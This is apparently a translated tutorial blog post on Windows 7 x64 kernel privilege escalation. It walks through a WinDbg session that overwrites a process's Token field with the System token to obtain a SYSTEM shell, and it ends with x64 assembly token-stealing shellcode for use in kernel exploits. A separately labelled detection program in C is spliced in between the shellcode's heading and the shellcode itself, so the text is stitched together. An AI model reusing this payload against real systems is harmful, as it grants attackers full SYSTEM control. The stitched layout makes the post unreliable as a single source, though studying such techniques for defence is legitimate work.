Token Replacement Privilege Escalation Experiment
Token replacement is the most common operation in Windows kernel privilege escalation.
This post explains what a Token is and how replacing it achieves privilege escalation.
First, a small test program; all it does is spawn a cmd process.
//RunCmd.exe
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
int main()
{
    printf("Before Run cmd ..\n");
    getchar();        // pause here while the token is swapped in the debugger
    system("cmd");    // the child inherits the (possibly replaced) token
    return 0;
}
Why spawn a child process? Because after replacing the Token we cannot directly observe the owning user of the parent process change.
A child process, however, inherits its parent's Token attributes, so if the child is created as a high-privilege user, that proves the replacement succeeded.
Let's look at this program's Token.
// win7x64
kd> !process 0 0
...
PROCESS fffffa8002276060
SessionId: 1 Cid: 0274 Peb: 7efdf000 ParentCid: 0838
DirBase: 785ad000 ObjectTable: fffff8a00b5d5530 HandleCount: 12.
Image: RunCmd.exe
kd> dt _EPROCESS fffffa8002276060 -d Token
nt!_EPROCESS
+0x208 Token : _EX_FAST_REF
The Token is at offset 0x208. Now look at its value:
kd> dq fffffa8002276060 + 0x208
fffffa80`02276268 fffff8a0`07d333e8 00000000`00068031
or:
kd> dt _EX_FAST_REF 0xfffffa8002276060 + 0x208
nt!_EX_FAST_REF
+0x000 Object : 0xfffff8a0`07d333e8 Void
+0x000 RefCnt : 0y1000
+0x000 Value : 0xfffff8a0`07d333e8
The Value is 0xfffff8a0`07d333e8.
Note that the low 4 bits of this number hold the token's reference count (RefCnt : 0y1000 above),
so the real Token pointer is fffff8a0`07d333e0:
kd> ? 0xfffff8a0`07d333e8 & ffffffff`fffffff0
Evaluate expression: -8108766972960 = fffff8a0`07d333e0
We can inspect this Token's contents:
kd> dt _TOKEN fffff8a0`07d333e0
nt!_TOKEN
+0x000 TokenSource : _TOKEN_SOURCE
+0x010 TokenId : _LUID
+0x018 AuthenticationId : _LUID
+0x020 ParentTokenId : _LUID
+0x028 ExpirationTime : _LARGE_INTEGER 0x7fffffff`ffffffff
+0x030 TokenLock : 0xfffffa80`03054880 _ERESOURCE
+0x038 ModifiedId : _LUID
+0x040 Privileges : _SEP_TOKEN_PRIVILEGES
+0x058 AuditPolicy : _SEP_AUDIT_POLICY
+0x074 SessionId : 1
+0x078 UserAndGroupCount : 0xd
+0x07c RestrictedSidCount : 0
+0x080 VariableLength : 0x264
+0x084 DynamicCharged : 0x400
+0x088 DynamicAvailable : 0
+0x08c DefaultOwnerIndex : 3
+0x090 UserAndGroups : 0xfffff8a0`07d336e8 _SID_AND_ATTRIBUTES
+0x098 RestrictedSids : (null)
+0x0a0 PrimaryGroup : 0xfffff8a0`06ee56c0 Void
+0x0a8 DynamicPart : 0xfffff8a0`06ee56c0 -> 0x501
+0x0b0 DefaultDacl : 0xfffff8a0`06ee56dc _ACL
+0x0b8 TokenType : 1 ( TokenPrimary )
+0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )
+0x0c0 TokenFlags : 0x2000
+0x0c4 TokenInUse : 0x1 ''
+0x0c8 IntegrityLevelIndex : 0xc
+0x0cc MandatoryPolicy : 3
+0x0d0 LogonSession : 0xfffff8a0`01bf4830 _SEP_LOGON_SESSION_REFERENCES
+0x0d8 OriginatingLogonSession : _LUID
+0x0e0 SidHash : _SID_AND_ATTRIBUTES_HASH
+0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH
+0x300 pSecurityAttributes : 0xfffff8a0`02ee5a70 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
+0x308 VariablePart : 0xfffff8a0`07d337b8
or:
kd> !token fffff8a0`07d333e0
_TOKEN 0xfffff8a007d333e0
TS Session ID: 0x1
User: S-1-5-21-1071733736-4194771383-3987741639-500
User Groups:
00 S-1-5-21-1071733736-4194771383-3987741639-513
Attributes - Mandatory Default Enabled
01 S-1-1-0
Attributes - Mandatory Default Enabled
02 S-1-5-32-544
Attributes - Mandatory Default Enabled Owner
03 S-1-5-32-545
Attributes - Mandatory Default Enabled
04 S-1-5-4
Attributes - Mandatory Default Enabled
05 S-1-2-1
Attributes - Mandatory Default Enabled
06 S-1-5-11
Attributes - Mandatory Default Enabled
07 S-1-5-15
Attributes - Mandatory Default Enabled
08 S-1-5-5-0-90708
Attributes - Mandatory Default Enabled LogonId
09 S-1-2-0
Attributes - Mandatory Default Enabled
10 S-1-5-64-10
Attributes - Mandatory Default Enabled
11 S-1-16-12288
Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-1071733736-4194771383-3987741639-513
Privs:
05 0x000000005 SeIncreaseQuotaPrivilege Attributes -
08 0x000000008 SeSecurityPrivilege Attributes -
09 0x000000009 SeTakeOwnershipPrivilege Attributes -
10 0x00000000a SeLoadDriverPrivilege Attributes -
11 0x00000000b SeSystemProfilePrivilege Attributes -
12 0x00000000c SeSystemtimePrivilege Attributes -
13 0x00000000d SeProfileSingleProcessPrivilege Attributes -
14 0x00000000e SeIncreaseBasePriorityPrivilege Attributes -
15 0x00000000f SeCreatePagefilePrivilege Attributes -
17 0x000000011 SeBackupPrivilege Attributes -
18 0x000000012 SeRestorePrivilege Attributes -
19 0x000000013 SeShutdownPrivilege Attributes -
20 0x000000014 SeDebugPrivilege Attributes -
22 0x000000016 SeSystemEnvironmentPrivilege Attributes -
23 0x000000017 SeChangeNotifyPrivilege Attributes - Enabled Default
24 0x000000018 SeRemoteShutdownPrivilege Attributes -
25 0x000000019 SeUndockPrivilege Attributes -
28 0x00000001c SeManageVolumePrivilege Attributes -
29 0x00000001d SeImpersonatePrivilege Attributes - Enabled Default
30 0x00000001e SeCreateGlobalPrivilege Attributes - Enabled Default
33 0x000000021 SeIncreaseWorkingSetPrivilege Attributes -
34 0x000000022 SeTimeZonePrivilege Attributes -
35 0x000000023 SeCreateSymbolicLinkPrivilege Attributes -
Authentication ID: (0,162aa)
Impersonation Level: Anonymous
TokenType: Primary
Source: User32 TokenFlags: 0x2000 ( Token in use )
Token ID: b269a9 ParentToken ID: 0
Modified ID: (0, b26710)
RestrictedSidCount: 0 RestrictedSids: 0x0000000000000000
OriginatingLogonSession: 3e7
Replacing with the System pointer
kd> !process 0 0 System
PROCESS fffffa80018d0090
SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 00187000 ObjectTable: fffff8a0000017f0 HandleCount: 487.
Image: System
kd> dq fffffa80018d0090 + 208
fffffa80`018d0298 fffff8a0`00004bb4 00000000`00000000
The System process's Token pointer & reference count is fffff8a0`00004bb4.
Start the replacement:
kd> dq fffffa8002276060 + 208
fffffa80`02276268 fffff8a0`07d333e8 00000000`00068031
kd> eq fffffa8002276060 + 208 fffff8a0`00004bb4
kd> dq fffffa8002276060 + 208
fffffa80`02276268 fffff8a0`00004bb4 00000000`00068031
Now press Enter in the RunCmd window and run the command:
whoami
Privilege escalation succeeded.
Also attached, x64 token-replacement shellcode:
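As an added example, not code from the original post: a small C program that decodes _EX_FAST_REF values the way the `? value & ~f` computation above does, then applies the defender's check this experiment implies: a non-System process whose decoded Token pointer equals the System process's is carrying a stolen token. The snapshot records are constructed from the debugger output above; the cmd.exe parent entry (Cid 0x838) and its token value are assumed.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example, not the original post's code. Process snapshots below are
 * constructed from the kd output in the walkthrough (Win7 x64 values). */

#define EX_FAST_REF_MASK 0xFULL   /* low 4 bits of _EX_FAST_REF hold RefCnt on x64 */
#define SYSTEM_PID       4

typedef struct {
    uint64_t pid;
    const char *image;
    uint64_t token_fastref;       /* raw _EPROCESS.Token (+0x208) qword */
} proc_snapshot_t;

/* Real _TOKEN pointer: clear the refcount bits, as `? value & ~f` did above. */
uint64_t token_pointer(uint64_t fastref) { return fastref & ~EX_FAST_REF_MASK; }

/* Cached reference count carried in the low nibble (0y1000 == 8 above). */
unsigned token_refcnt(uint64_t fastref) { return (unsigned)(fastref & EX_FAST_REF_MASK); }

/* Count non-System processes whose primary token object is System's own.
 * A user process normally owns a distinct _TOKEN, so a match is exactly the
 * artifact left behind by the `eq` overwrite shown in the walkthrough.
 * Returns -1 when no System entry is present, since the check cannot run. */
int count_token_theft(const proc_snapshot_t *procs, size_t n)
{
    uint64_t system_token = 0;
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        if (procs[i].pid == SYSTEM_PID)
            system_token = token_pointer(procs[i].token_fastref);
    if (system_token == 0) return -1;
    for (size_t i = 0; i < n; i++)
        if (procs[i].pid != SYSTEM_PID &&
            token_pointer(procs[i].token_fastref) == system_token)
            hits++;
    return hits;
}

/* Constructed snapshot taken after the overwrite: RunCmd.exe (Cid 0x274)
 * now holds System's token value. The cmd.exe parent row is assumed. */
static const proc_snapshot_t sample[] = {
    { 0x004, "System",     0xfffff8a000004bb4ULL },
    { 0x838, "cmd.exe",    0xfffff8a006ee5018ULL },   /* constructed */
    { 0x274, "RunCmd.exe", 0xfffff8a000004bb4ULL },   /* post-eq value */
};

int main(void)
{
    printf("processes carrying System's token: %d\n",
           count_token_theft(sample, sizeof sample / sizeof sample[0]));
    return 0;
}
```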
.CONST
; Windows 7 SP1 x64 Offsets
KTHREAD_OFFSET  equ 188h    ; nt!_KPCR.PcrbData.CurrentThread
EPROCESS_OFFSET equ 70h     ; nt!_KTHREAD.ApcState.Process
SYSTEM_PID      equ 04h     ; SYSTEM Process PID
FLINK_OFFSET    equ 188h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
PID_OFFSET      equ 180h    ; nt!_EPROCESS.UniqueProcessId
TOKEN_OFFSET    equ 208h    ; nt!_EPROCESS.Token

.CODE
ShellcodeTokenReplace PROC
    push rcx
    push rdx
    xor rax, rax
    mov rax, gs:[rax + KTHREAD_OFFSET]
    mov rax, [rax + EPROCESS_OFFSET]
    mov rcx, rax
    mov rdx, SYSTEM_PID
SearchSystemPID:
    mov rax, [rax + FLINK_OFFSET]
    sub rax, FLINK_OFFSET
    cmp [rax + PID_OFFSET], rdx
    jne SearchSystemPID
    mov rax, [rax + TOKEN_OFFSET]
    mov [rcx + TOKEN_OFFSET], rax
    pop rdx
    pop rcx
    ret
ShellcodeTokenReplace ENDP
END